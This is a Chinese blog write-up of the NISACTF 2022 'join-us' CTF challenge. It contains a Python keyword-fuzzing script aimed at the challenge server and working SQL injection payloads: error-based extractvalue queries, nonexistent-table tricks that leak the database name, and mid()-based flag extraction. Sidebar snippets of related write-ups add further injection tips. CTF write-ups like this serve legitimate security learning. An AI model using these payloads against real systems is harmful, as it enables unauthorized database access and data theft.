[NISACTF 2022]join-us

最新推荐文章于 2025-05-29 09:57:06 发布
最新推荐文章于 2025-05-29 09:57:06 发布
阅读量353 收藏
点赞数
文章标签: 数据库 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/m0_70819573/article/details/129541382
版权

 进入登录界面,发现sql注入窗口,首先进行fuzz测试。

脚本:

import requests
fuzz={'length ','+','handler','like','select','sleep','database','delete','having','or','as','-~','BENCHMARK','limit','left','select','insert'
,'sys.schema_auto_increment_columns','join','right','#','&','&&','\\','handler','---','--','--+','INFORMATION','--',';','!','%','+','xor','<>'
,'(','>','<',')','.','^','=','AND','BY','CAST','COLUMN','COUNT','CREATE','END','case',"'1'='1'",'when',"admin'",'length','+','REVERSE','ascii'
,'select','database','left','right','union','||','oorr','/','//','//*','*/*','/**/','anandd','GROUP','HAVING','IF','INTO','JOIN','LEAVE','LEFT'
,'LEVEL','sleep','LIKE','NAMES','NEXT','NULL','OF','ON','|','infromation_schema','user','OR','ORDER','ORD','SCHEMA','SELECT','SET','TABLE','THEN'
,'UPDATE','USER','USING','VALUE','VALUES','WHEN','WHERE','ADD','AND','prepare','set','update','delete','drop','inset','CAST','COLUMN','CONCAT'
,'GROUP_CONCAT','group_concat','CREATE','DATABASE','DATABASES','alter','DELETE','DROP','floor','rand()','information_schema.tables','TABLE_SCHEMA'
,'%df','concat_ws()','concat','LIMIT','ORD','ON'
,'extractvalue','order','CAST()','by','ORDER','OUTFILE','RENAME','REPLACE','SCHEMA','SELECT','SET','updatexml','SHOW','SQL','TABLE','THEN','TRUE','instr'
,'benchmark','format','bin','substring','ord','UPDATE','VALUES','VARCHAR','VERSION','WHEN','WHERE','/*','`',',','users','%0a','%0b','mid','for','BEFORE','REGEXP'
,'RLIKE','in','sys schemma','SEPARATOR','XOR','CURSOR','FLOOR','sys.schema_table_statistics_with_buffer','INFILE','count','%0c','from','%0d','%a0','=','@','else'}
for i in fuzz:
    res = requests.post(url='http://1.14.71.254:28911/dl.php',data={'tt':i})
    if '不要耍小心思喔~'  in res.text:
        print(i)

结果:

as
IF
rand()
LEFT
by
update
=
substring
handler
union
floor
benchmark
COLUMN
UPDATE
&
sys.schema_auto_increment_columns
&&
'1'='1'
database
case
AND
right
CAST
FLOOR
left
updatexml
DATABASES
BENCHMARK
BY
sleep
DATABASE
insert
anandd
ascii
CAST()

其实一开始想到的是布尔盲注,因为输入1会返回txw4ever,输入0返回空白,但是禁用了ascii函数,禁用了updatexml函数,但是可以使用extractvalue函数。

database被禁,所以可以考虑用访问一个不存在的数据库来返回数据库。

payload:

1'||(select * from aa)#或者将||换成or,爆出sqlsql库。

接着就是报错注入的正常操作:

-1' || extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema like 'sqlsql')))#

爆出表Fal_flag,output

接下来column被ban了,所以用无列注入,join题目也有提示。

-1' || extractvalue(1,mid(concat(0x7e,(select data from output)),1,30))#

最后用mid或reverse函数读取flag

1' || extractvalue(1,mid(concat(0x7e,(select data from output)),10,40))#

ha0cker
关注
[NISACTF 2022]join-us - 报错注入&无列名注入
oZuoShen123的博客
10-06 698
这种框,可以直接爆破关键字,看是否拦截,也可以手动尝试,发现=、union、and、or、substr、database等关键字都拦截了 1、学到了:可以用数据库中不存在的表名或者不存在的自定义函数名爆出数据库名,1'-a()# 或 1' || (select * from aa)#   FUNCTION sqlsql.a does not exist 2、直接甩一个报错注入上去,extractvalue(0,concat(0x7e,1,0x7e));#   没拦截,说明可以试一下
[SWPUCTF 2021 新生赛]easy_sql - 联合注入||报错注入||sqlmap
oZuoShen123的博客
10-06 1200
得到:XPATH syntax error: ‘~NSSCTF{82bf2238-f61d-41f1-b103-’最终:flag=NSSCTF{82bf2238-f61d-41f1-b103-848e28154cee}得到:XPATH syntax error: ‘~ test_tb,users ~’得到:Your Login name:xxx Your Password:yyy。得到:XPATH syntax error: ‘~ id,flag ~’说明无回显,尝试报错注入。表为:test_db。
【[NISACTF 2022]join-us
qq_40567274的博客
04-08 928
[NISACTF 2022] 提示:这里可以添加系列文章的所有文章的目录,目录需要自己手动添加 例如:第一章 Python 机器学习入门之pandas的使用 提示:写完文章后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录[NISACTF 2022]前言一、pandas是什么?二、使用步骤1.引入库2.读入数据总结 前言 提示:这里可以添加本文要记录的大概内容: 例如:随着人工智能的不断发展,机器学习这门技术也越来越重要,很多人都开启了学习机器学习,本文就介绍了机器学习的基础内容。 提示:
[NISACTF 2022]join-us 无列名注入 过滤database() 报错获取表名 字段名
m0_64180167的博客
10-31 354
又是sql注入来做一些吧 这里我们可以很快就获取注入点抓包开干开fuzz过滤很多东西哦 database都过滤了 那么要咋弄啊。。。
[NISACTF 2022]下
qq_62046696的博客
07-30 2876
打开界面看见这种,格式一般都是利用管道符然后进行堆叠注入或者报错注入试一下堆叠注入试了一下被过滤掉了,那就是报错注入喽or被过滤用||代替=被过滤用like代替database里面的as被过滤,通过查询一个不存在的表,通过报错获得表名column被过滤,用无列名注入输出长度限制,mid函数,substr函数t因为as被过滤所以不能使用,database因为aa是错误的表名,sqlsql就是正确的表名,通过报错。...
NISACTF2022公开通道(复现)
as you know, nlp is fantasitc!
03-31 5010
目录middlerce(复现)join-us(复现)hardsql(复现) middlerce(复现) <?php include "check.php"; if (isset($_REQUEST['letter'])){ $txw4ever = $_REQUEST['letter']; if (preg_match('/^.*([\w]|\^|\*|\(|\~|\`|\?|\/| |\||\&|!|\<|\>|\{|\x09|\x0a|\[).*$/m',$txw
NISACTF 2022 writeup
热门推荐
st1cky的博客
03-29 3万+
周末两天的比赛 WEB(11/12)、PWN(5/6)、Reverse(3/6)、Crypto(3/7)、Misc(8/12) WEB没有AK还是略有遗憾,到后面实在做不动了。 第一次写这么长的WP… WEB checkin <?php error_reporting(0); include "flag.php"; // ‮⁦NISACTF⁩⁦Welcome to if ("jitanglailo" == $_GET[ahahahaha] &‮⁦+!!⁩⁦& "‮⁦ Flag!.
CTF网络安全题目个人导航【持续更新】
oZuoShen123的博客
10-11 1128
个人整理
WebNISACTF 2022 个人复现
uuzeray的博客
12-01 395
明天就新生赛了,练套题保持下手感吧(文章只选取了一部分)
SQL进阶学习
十一.的博客
11-21 703
因为输入1会返回txw4ever,输入0返回空白,但是禁用了ascii函数,禁用了updatexml函数,但是可以使用extractvalue函数。database被禁,所以可以考虑用。
NSSCTF web学习
akxnxbshai的博客
09-30 1400
NSSCTF web刷题
2022NISACTF
unexpectedthing的博客
07-13 1779
NISACTF
[NISACTF 2022]WriteUp web
Pysnow's Blog
04-01 5376
[NISACTF 2022] WEB checkin 打开一看,本来一位就是简单的一道get传参题,结果发现复制的时候出现了问题 所以我就把代码复制到vscode上面来 发现存在Unicode特殊字符,直接把字符原样复制下来,然后URLencode编码一下 最终payload ?ahahahaha=jitanglailo&%E2%80%AE%E2%81%A6Ugeiwo%E2%81%A9%E2%81%A6cuishiyuan=%E2%80%AE%E2%81%A6 Flag!%E2%81%
[NISACTF 2022]
snowlyzz的博客
09-09 6460
NISACTF部分WP
[NISACTF 2022]上
qq_62046696的博客
07-26 5403
在php中变量名字是由数字字母和下划线组成的,所以不论用post还是get传入变量名的时候都将空格、+、点、[转换为下划线,但是用一个特性是可以绕过的,就是当[提前出现后,后面的点就不会再被转义了,suchas`CTF[SHOW.COM`=>`CTF_SHOW.COM`打开界面本来以为是简单的get传参,结果发现有的字符不能选中,选了好几下也不可以很蹊跷,仅仅想到了可能是代替的一些东西吧,然后csdn了一下。array1[]=1&array2[]=2本来觉得数组绕过就可以可是,发现输出了?...
变更数据捕获(CDC)与流处理引擎实现医疗数据实时同步(下)
AllenLV的博客
05-29 613
Flink CDC技术为医疗数据实时同步提供了高效解决方案。该技术通过解析数据库日志捕获全量和增量数据变更,支持MySQL、PostgreSQL等多种数据库类型。在医疗场景中,Flink CDC可实时同步HIS、EMR等系统的数据到临床数据中心,实现秒级延迟。其优势包括低性能影响、高可用性、断点续传等特性。构建过程中需考虑统一数据模型、数据质量、系统性能等关键因素。Flink CDC的应用显著提升了医疗数据处理的实时性和准确性,为临床决策提供有力支持。
【Redis】三、在springboot中应用redis
naihe_fish的博客
05-22 1049
本文介绍了如何在Spring Boot项目中集成Redis作为缓存中间件,以优化用户信息管理的性能。首先,通过引入redis依赖,配置Redis连接信息。接着,创建了一个用户管理模块,包括数据库表、实体类、控制器和服务层。在服务层中,通过RedisTemplate实现了缓存逻辑,优先从Redis中查询用户分数,若未命中则从MySQL数据库中获取并缓存到Redis中。最后,通过Postman测试接口,验证了Redis缓存的有效性,首次查询较慢,但后续查询速度显著提升。
vdbench磁盘性能测试方法
最新发布
xiyanxiyan10的专栏
05-29 94
安装运行环境。
springboot--实战--大事件--用户接口开发
m0_73856804的博客
05-27 1574
定义了一种简洁的、自包含的格式,用于通信双方以JSON数据格式安全的传输信息。组成:第一部分:Header(头),记录令牌类型、签名算法等。例如,算法用于防篡改第二部分:Payload(有效载荷),携带一些自定义信息,默认信息。例如。而外在表示为一段无规律的64个可打印字符原因:借助base64编码方式(Base64:是一种基于64个可打印字符(A-Z a-z 0-9 + /)来表示二进制数据的编码方式)来完成,将json字符串变为64个可打印字符,
parent-join-client 6.2.3 中文API文档完整指南
资源摘要信息:"parent-join-client-6.2.3-API文档-中文版.zip" parent-join-client-6.2.3-API文档-中文版.zip 是一个压缩文件包,提供了 Elasticsearch 插件parent-join-client的6.2.3版本的API文档中文版。这个...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值